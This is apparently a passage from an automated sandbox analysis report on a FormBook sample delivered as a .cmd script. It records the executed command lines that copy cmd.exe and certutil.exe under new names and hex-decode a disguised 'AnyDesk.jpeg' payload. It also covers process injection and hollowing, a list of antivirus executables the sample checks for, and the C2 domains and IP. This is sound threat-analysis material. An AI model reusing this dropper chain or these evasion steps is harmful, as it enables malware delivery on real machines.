          Source: explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: AnyDesk.PIF, 0000000A.00000002.1533987559.000000000093E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW05
          Source: explorer.exe, 00000012.00000003.3076789400.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,10_2_02D5F744
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94463FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF6E94463FC
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D5894C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6E943823C
          Source: C:\Windows\SysWOW64\SndVol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94393B0 SetUnhandledExceptionFilter,4_2_00007FF6E94393B0
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9438FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6E9438FA4
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94393B0 SetUnhandledExceptionFilter,6_2_00007FF6E94393B0
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9438FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6E9438FA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685524E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF685524E18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855253E0 SetUnhandledExceptionFilter,7_2_00007FF6855253E0
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94393B0 SetUnhandledExceptionFilter,11_2_00007FF6E94393B0
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9438FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF6E9438FA4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4990000 protect: page execute and read and writeJump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\Public\Libraries\AnyDesk.PIFThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 49AF110Jump to behavior
          Drops or copies certutil.exe with a different name (likely to bypass HIPS)
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
          Drops or copies cmd.exe with a different name (likely to bypass HIPS)
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4990000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\SndVol.exeThread register set: target process: 4084Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 4084Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\SndVol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\SndVol.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: FE0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4990000Jump to behavior
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF6854D7024
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
          Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
          Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
          Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6854C4AF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6854C4E88
          Source: explorer.exe, 00000012.00000000.1548457580.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542559522.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000012.00000002.3863672524.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3864752529.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
          Source: explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3864752529.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000012.00000000.1548457580.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285633326.0000000009378000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
          Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF6E94351EC
          Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF6E9433140
          Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF6E94351EC
          Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF6E9433140
          Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF685523800
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D45ACC
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,10_2_02D4A7C4
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D45BD8
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,10_2_02D4A810
          Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF6E94351EC
          Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF6E9433140
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9448654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF6E9448654
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855070F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6855070F4
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E942586C GetVersion,4_2_00007FF6E942586C
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF68544E568
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF68543227C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685455648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF685455648
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854354A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF6854354A0

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services11
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		2
          Valid Accounts          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop ProtocolData from Removable Media21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)21
          Access Token Manipulation          		2
          Obfuscated Files or Information          		Security Account Manager1
          System Network Connections Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook812
          Process Injection          		1
          Install Root Certificate          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput Capture113
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Timestomp          		LSA Secrets235
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials441
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
          Masquerading          		DCSync2
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts          		Proc Filesystem3
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation          		Network Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd812
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563771 Sample: A1 igazol#U00e1s.cmd Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 60 www.yzsports200.xyz 2->60 62 www.rnuah.xyz 2->62 64 10 other IPs or domains 2->64 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Multi AV Scanner detection for submitted file 2->72 76 9 other signatures 2->76 12 cmd.exe 1 2->12         started        signatures3 74 Performs DNS queries to domains with low reputation 62->74 process4 process5 14 AnyDesk.PIF 4 12->14         started        18 extrac32.exe 1 12->18         started        21 alpha.exe 1 12->21         started        23 5 other processes 12->23 dnsIp6 66 aquadream.rs 185.102.77.43, 443, 49705, 49706 HOSTING90UPSTREAMconnectivityCZ Czech Republic 14->66 102 Machine Learning detection for dropped file 14->102 104 Writes to foreign memory regions 14->104 106 Allocates memory in foreign processes 14->106 114 4 other signatures 14->114 25 SndVol.exe 14->25         started        28 cmd.exe 1 14->28         started        56 C:\Users\Public\alpha.exe, PE32+ 18->56 dropped 108 Drops PE files to the user root directory 18->108 110 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 18->110 112 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 18->112 30 kn.exe 3 2 21->30         started        32 kn.exe 2 23->32         started        35 extrac32.exe 1 23->35         started        file7 signatures8 process9 file10 84 Modifies the context of a thread in another process (thread injection) 25->84 86 Maps a DLL or memory area into another process 25->86 88 Sample uses process hollowing technique 25->88 94 3 other signatures 25->94 37 explorer.exe 61 1 25->37 injected 39 esentutl.exe 2 28->39         started        43 conhost.exe 28->43         started        90 Registers a new ROOT certificate 30->90 92 Drops PE files with a suspicious file extension 30->92 52 C:\Users\Public\Libraries\AnyDesk.PIF, PE32 32->52 dropped 54 C:\Users\Public\kn.exe, PE32+ 35->54 dropped signatures11 process12 file13 45 msdt.exe 37->45         started        58 C:\Users\Public\alpha.pif, PE32 39->58 dropped 78 Drops PE files to the user root directory 39->78 80 Drops PE files with a suspicious file extension 39->80 82 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 39->82 signatures14 process15 signatures16 96 Modifies the context of a thread in another process (thread injection) 45->96 98 Maps a DLL or memory area into another process 45->98 100 Tries to detect virtualization through RDTSC 